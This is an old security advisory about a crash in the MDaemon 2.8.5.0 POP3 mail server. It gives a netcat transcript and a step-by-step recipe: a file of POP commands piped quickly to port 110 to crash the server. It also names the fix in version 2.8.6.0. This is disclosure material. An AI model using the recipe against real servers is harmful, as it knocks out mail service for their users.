COMMAND
mdaemon
SYSTEMS AFFECTED
mdaemon 2.8.5.0
PROBLEM
Craig found following. A single user was not able to receive
eMail - after the password was send, the mail client just haltet,
and did nothing till the timeout. He tried to find the error, by
using netcat to enter the commands on my own and find out, whats
wrong. Playing around something strange happened:
netcat 192.168.0.3 110
+OK Server1 POP service ready using UNREGISTERED SOFTWARE [1] MDaemon v2.8.5.0 T
User User1
+OK User1... Recipient ok
pass yaddayadda
{ENTER}
-ERR that command is valid only in the AUTHORIZATION state!
uidl
-ERR unknown POP command!
quit
+OK
.
quit
+OK User1 Server1 POP Server signing off (mailbox empty)
MDaemon crashed after leaving, showing 2 popups. If you try to
verify this, write a input file:
User User1
pass yaddayadda
{just press ENTER}
uidl
quit
quit
then:
netcat [Server_to_test] 110 <inputfile
You need to send the commands fast! The more messages you send,
the more time you got to crash the server; you need to send all
the commands before the status of the mailbox is shown ("+OK
User1's mailbox has 3600 total messages (1018800 octets).").
When you see that message, it is to late...
If there are too many files in a users directory (e.g.
\mdaemon\users\User1") the Server needs a long time to read them
(for the report - uidl), and the clients got timeouts because it
takes a long time.
Some people who were mailbombed could have the problem of not
being able to receive their messages and could think their account
was deleted or the password was changed.
SOLUTION
This problem was fixed in Mdaemon V2.8.6.0 which has been
available since November 1999 and the problem is fixed in any
version released since then.